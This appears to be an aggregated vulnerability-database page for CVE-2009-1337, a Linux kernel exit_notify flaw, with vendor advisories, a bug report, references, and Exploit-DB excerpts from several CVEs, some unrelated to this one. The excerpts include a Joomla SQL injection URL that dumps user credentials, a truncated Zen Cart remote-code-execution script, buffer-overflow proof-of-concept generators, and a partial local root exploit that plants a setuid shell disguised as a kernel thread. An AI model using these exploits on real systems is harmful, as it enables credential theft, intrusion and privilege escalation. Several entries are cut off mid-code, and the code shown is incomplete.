CVE-2009-1337
Published 2009-04-22
Priority P4 · medium · CVSS 2.0 base score 4.4 (AV:L/AC:M/Au:N/C:P/I:P/A:P)
Exploit available · EPSS 1.26% (65.8th percentile)
The exit_notify function in kernel/exit.c in the Linux kernel before 2.6.30-rc1 does not restrict exit signals when the CAP_KILL capability is held, which allows local users to send an arbitrary signal to a process by running a program that modifies the exit_signal field and then uses an exec system call to launch a setuid application.
Affected
299 version ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| linux | linux_kernel | <= 2.6.29 | — |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 4.4 | MEDIUM | AV:L/AC:M/Au:N/C:P/I:P/A:P |
| vendor_ubuntu | — | 4.9 | MEDIUM | — |
| vendor_redhat | — | 4.4 | MEDIUM | — |
VMware
VMSA-2009-0016: VMware vCenter and ESX update release and vMA patch release address multiple security issues in third party components.
vendor_vmware · 2009-11-20 · CVSS 5.0
CVE-2007-2052 [MEDIUM]
a. JRE Security Update JRE update to version 1.5.0_20, which addresses multiple security issues that existed in earlier releases of JRE. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the following names to the security issues fixed in JRE 1.5.0_18: CVE-2009-1093, CVE-2009-1094, CVE-2009-1095, CVE-2009-1096, CVE-2009-1097, CVE-2009-1098, CVE-2009-1099, CVE-2009-1100, CVE-2009-1101, CVE-2009-1102, CVE-2009-1103, CVE-2009-1104, CVE-2009-1105, CVE-2009-1106, and CVE-2009-1107. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the following names to the security issues fixed in JRE 1.5.0_20: CVE-2009-
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu · 2009-07-02 · CVSS 4.9
CVE-2009-1242 [MEDIUM]
Igor Zhbanov discovered that NFS clients were able to create device nodes
even when root_squash was enabled. An authenticated remote attacker
could create device nodes with open permissions, leading to a loss of
privacy or escalation of privileges. Only Ubuntu 8.10 and 9.04 were
affected. (CVE-2009-1072)
Dan Carpenter discovered that SELinux did not correctly handle
certain network checks when running with compat_net=1. A local
attacker could exploit this to bypass network checks. Default Ubuntu
installations do not enable SELinux, and only Ubuntu 8.10 and 9.04 were
affected. (CVE-2009-1184)
Shaohua Li discovered that memory was not correctly initialized in the
AGP subsystem. A local attacker could potentially re
Red Hat
kernel: exit_notify: kill the wrong capable(CAP_KILL) check
vendor_redhat · 2009-02-25 · CVSS 4.4
CVE-2009-1337 [MEDIUM]
GHSA
GHSA-w3gg-x9j7-v653: The exit_notify function in kernel/exit
ghsa_unreviewed · 2022-05-02
CVE-2009-1337 [MEDIUM]
No detection rules found.
Exploit-DB
Joomla! Component idoblog 1.1b30 (com_idoblog) - SQL Injection
exploitdb · 2009-08-11
CVE-2009-3417
---
#####################################################################################
#### com_idoblog SQL Injection ALL VERSIONS ####
#####################################################################################
# #
# Discovered by : KKR #
# We are: knet, kiko, ricota, servl #
# Contact: elricota[*A*T*]gmail[*D*O*T]com #
#####################################################################################
[+] Earlier editions had the same flaws, but not everything was fixed...
[+] This SQL injection affects all versions.
[-]
[+] exploit:
[-] /index.php?option=com_idoblog&task=profile&Itemid=1337&userid=+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
Exploit-DB
Zen Cart 1.3.8 - Remote Code Execution
exploitdb · 2009-06-23
CVE-2009-2255
---
#!/usr/bin/php
|
| |
| \$system> php $argv[0] |
| Notes: ex: http://victim.com/site (no slash) |
| |
";exit(1);
}
$url = $argv[1];
$trick = "/password_forgotten.php";
$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
$real_kthxbye = remote_exec($url);
# Remote Code Execution Exploit
function remote_exec($url) {
global $xpl, $url, $trick;
echo "\n[-] Remote Code Execution";
if(!$xpl->get($url.'/admin/')) die("\n[!] error - the /admin/ directory is protected or don't exist.\n");
$n = substr(md5(rand(0, 1337)), 0, 5).".php"; # random php file
$code = '';
$form = array(frmdt_url => $url."/admin/record_company.php".$trick."?action=insert",
"record_company_name" => "0",
"record_company_image" => array(frmdt_type => "tgreal/suce", # it w
Exploit-DB
DigiMode Maya 1.0.2 - '.m3u' / '.m3l' Buffer Overflow (PoC)
exploitdb · 2009-05-14
CVE-2009-1817
---
#####################################################################################################
# DigiMode Maya 1.0.2 (.M3U File) Local Buffer Overflow PoC
# Discovered by SirGod - www.mortal-team.net & www.h4cky0u.org
######################################################################################################
my $chars= "A" x 1337;
my $file="sirgod.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";
print "SirGod - www.mortal-team.net & www.h4cky0u.org";
#####################################################################################################
# DigiMode Maya 1.0.2 (.M3L File) Local Buffer Overflow PoC
# Discovered by SirGod
Exploit-DB
Bmxplay 0.4.4b - '.bmx' Local Buffer Overflow (PoC)
exploitdb · 2009-05-04
CVE-2009-4759
---
#####################################################################################################
# Bmxplay 0.4.4b (.BMX File) Local Buffer Overflow PoC
# Discovered by SirGod - www.mortal-team.net & www.h4cky0u.org
# Download : http://www.brothersoft.com/bmxplay-download-235557.html
######################################################################################################
my $chars= "A" x 1337;
my $file="sirgod.bmx";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";
print "SirGod - www.mortal-team.net & www.h4cky0u.org";
# milw0rm.com [2009-05-04]
Exploit-DB
EW-MusicPlayer 0.8 - '.m3u' Local Buffer Overflow (PoC)
exploitdb · 2009-05-04
CVE-2009-4757
---
#####################################################################################################
# EW-MusicPlayer0.8 (.M3U File) Local Buffer Overflow PoC
# Discovered by SirGod - www.mortal-team.net & www.h4cky0u.org
# Download : http://www.brothersoft.com/ew-musicplayer-download-97163.html
######################################################################################################
my $chars= "A" x 1337;
my $file="sirgod.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";
print "SirGod - www.mortal-team.net & www.h4cky0u.org";
# milw0rm.com [2009-05-04]
Exploit-DB
Linux Kernel < 2.6.29 - 'exit_notify()' Local Privilege Escalation
exploitdb · 2009-04-08
CVE-2009-1337
Linux Kernel > /tmp/.m.c
#include
int main()
{
setuid(0);
execl("/bin/bash","[kthreadd]",NULL);
}
EOF
cc /tmp/.m.c -o /tmp/.m
rm /tmp/.m.c
echo -e "Compiling the exploit code..."
cat >> /tmp/exploit.c
#include
#include
#include
#include
int child(void *data)
{
sleep(2);
printf("I'm gonna kill the suidroot father without having root rights :D\n");
execl("/usr/bin/gpasswd","%s",NULL);
exit(0);
}
int main()
{
int stacksize = 4*getpagesize();
void *stack, *stacktop;
stack = malloc(stacksize);
stacktop = stack + stacksize;
chdir("/etc/logrotate.d");
int p = clone(child, stacktop, CLONE_FILES|SIGSEGV, NULL);
if (p>0) execl("/usr/bin/chfn","\n/tmp/.a\n{\nsize=0\nprerotate\n\tchown root /tmp/.m;chmod u+s /tmp/.m\nendscript\n}\n\n",NULL);
}
EOF
cc /tmp/exploit.c -o /tmp/.ex
rm /tmp/exploit.c
Bugzilla
CVE-2009-1337 kernel: exit_notify: kill the wrong capable(CAP_KILL) check
bugzilla · 2009-04-03 · CVSS 4.4
CVE-2009-1337 [MEDIUM]
Description of problem:
A malicious application can execute a setuid binary before exit. This would mean that we will not reset the ->exit_signal to SIGCHLD unless the binary drops CAP_KILL.
Reference:
http://marc.info/?l=linux-kernel&m=123560588713763&w=2
Discussion:
[RESEND] exit_notify: kill the wrong capable(CAP_KILL) check
http://patchwork.kernel.org/patch/16544/
---
Created attachment 338457
Upstream patch
Upstream commit:
http://git.kernel.org/linus/432870dab85a2f69dc417022646cb9a70acf7f94
---
Upstream commit for 2.4
http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.4.37.y.git;a=commitdiff;h=8d1f2ab731ab54b12f82eed4da4d1cefd238578c
---
This issue has been addressed in the following products:
MRG
CTF
pwn / zapping_setuid_2
ctf_writeups · 2023 · CVSS 6.9
CVE-2009-0876 [MEDIUM]
# Zapping a Setuid 1 & 2
by YiFei Zhu
This challenge explores how you could trick the `readlink("/proc/self/exe")`
syscall.
> Zapping a Setuid 1
>
> I was reading [how Zapps work](https://zapps.app/technology/) the other day
> and I thought I could [do better](https://github.com/warptools/ldshim/issues/1).
> However, what happens when a setuid was zapped?
>
> `$ socat file:$(tty),raw,echo=0 tcp:zapp-setuid-1.chal.uiuc.tf:1337`
>
> Hint: Oops I left [CVE-2009-0876](https://bugs.gentoo.org/260331) open.
> Zapping a Setuid 2
>
> Ok ok ok, but what if there was another way?
>
> `$ socat file:$(tty),raw,echo=0 tcp:zapp-setuid-2.chal.uiuc.tf:1337`
>
> Hint 1: The "zapps" symlink is for accessibility. The intended solution does not
> depend on the symlink.
>
> Hint 2: The additional patches t
References
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=432870dab85a2f69dc417022646cb9a70acf7f94
http://lists.opensuse.org/opensuse-security-announce/2009-05/msg00002.html
http://lists.opensuse.org/opensuse-security-announce/2009-06/msg00000.html
http://lists.opensuse.org/opensuse-security-announce/2009-06/msg00001.html
http://lists.opensuse.org/opensuse-security-announce/2009-06/msg00002.html
http://marc.info/?l=linux-kernel&m=123560588713763&w=2
http://patchwork.kernel.org/patch/16544/
http://rhn.redhat.com/errata/RHSA-2009-0473.html
http://secunia.com/advisories/34917
http://secunia.com/advisories/34981
http://secunia.com/advisories/35011
http://secunia.com/advisories/35015
http://secunia.com/advisories/35120
http://secunia.com/advisories/35121
http://secunia.com/advisories/35160
http://secunia.com/advisories/35185
http://secunia.com/advisories/35226
http://secunia.com/advisories/35324
http://secunia.com/advisories/35387
http://secunia.com/advisories/35390
http://secunia.com/advisories/35394
http://secunia.com/advisories/35656
http://secunia.com/advisories/37471
http://wiki.rpath.com/Advisories:rPSA-2009-0084
http://www.debian.org/security/2009/dsa-1787
http://www.debian.org/security/2009/dsa-1794
http://www.debian.org/security/2009/dsa-1800
http://www.kernel.org/pub/linux/kernel/v2.6/testing/ChangeLog-2.6.30-rc1
http://www.mandriva.com/security/advisories?name=MDVSA-2009:119
http://www.mandriva.com/security/advisories?name=MDVSA-2009:135
http://www.openwall.com/lists/oss-security/2009/04/07/1
http://www.openwall.com/lists/oss-security/2009/04/17/3
http://www.redhat.com/support/errata/RHSA-2009-0451.html
http://www.redhat.com/support/errata/RHSA-2009-1024.html
http://www.redhat.com/support/errata/RHSA-2009-1077.html
http://www.securityfocus.com/archive/1/503610/100/0/threaded
http://www.securityfocus.com/archive/1/507985/100/0/threaded
http://www.securityfocus.com/archive/1/512019/100/0/threaded
http://www.securityfocus.com/bid/34405
http://www.securitytracker.com/id?1022141
http://www.ubuntu.com/usn/usn-793-1
http://www.vmware.com/security/advisories/VMSA-2009-0016.html
http://www.vupen.com/english/advisories/2009/3316
https://bugzilla.redhat.com/show_bug.cgi?id=493771
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10919
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11206
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8295
https://rhn.redhat.com/errata/RHSA-2009-1550.html
https://www.redhat.com/archives/fedora-package-announce/2009-May/msg01126.html